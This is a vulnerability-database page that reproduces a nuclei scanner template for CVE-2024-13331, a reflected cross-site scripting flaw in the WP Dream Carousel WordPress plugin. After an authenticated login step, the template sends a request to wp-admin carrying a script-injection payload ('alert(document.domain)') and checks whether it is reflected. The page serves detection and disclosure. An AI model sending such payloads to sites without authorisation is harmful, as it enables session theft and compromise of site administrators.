Lucene search
K

WP Dream Carousel < 1.0.1b - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

Reflected cross-site scripting in WordPress Dream Carousel below 1.0.1b allows scripts via URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13331
4 Feb 202506:16
circl
CNNVD
WordPress plugin WP Dream Carousel 安全漏洞
4 Feb 202500:00
cnnvd
CVE
CVE-2024-13331
4 Feb 202506:00
cve
Cvelist
CVE-2024-13331 WP Dream Carousel <= 1.0.1b - Reflected XSS
4 Feb 202506:00
cvelist
EUVD
EUVD-2024-51536
3 Oct 202520:07
euvd
NVD
CVE-2024-13331
4 Feb 202506:15
nvd
OSV
CVE-2024-13331
4 Feb 202506:15
osv
Patchstack
WordPress WP Dream Carousel plugin <= 1.0.1b - Reflected XSS vulnerability
4 Feb 202522:37
patchstack
Positive Technologies
PT-2025-2117
4 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13331
8 Feb 202504:36
redhatcve
Rows per page
id: CVE-2024-13331

info:
  name: WP Dream Carousel < 1.0.1b - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Dream Carousel WordPress plugin < 1.0.1b contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires victim to load a maliciously crafted URL.
  remediation: |
    Update to version 1.0.1b or later, where the vulnerability is fixed.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  reference:
    - https://wpscan.com/vulnerability/6425ccff-2e18-4498-b8b1-d493286efc7b/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13331
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13331
    cwe-id: CWE-79
    epss-score: 0.00561
    epss-percentile: 0.42142
    cpe: cpe:2.3:a:neoloki:wp_dream_carousel:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: neoloki
    product: wp_dream_carousel
    publicwww-query: "/plugins/wp-dream-carousel/"
  tags: cve,cve2024,neoloki,wp-dream-carousel,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=wp_dream_carousel&"></script><script>alert(document.domain)</script><script>=1" HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "></script><script>alert(document.domain)</script><script>", "wp-dream-carousel")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022070429df2d5dadb349753398958286bd62c10625f4a985204663efe6fe9e7e2760220578dfa4158bff1f34a1a3e2571406cdc06cfbfa2e5b55fc4d0f3efd9f5ff29f7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 16:02Current
7.4High risk
Vulners AI Score7.4
CVSS 3.16.1
EPSS0.00561
SSVC
18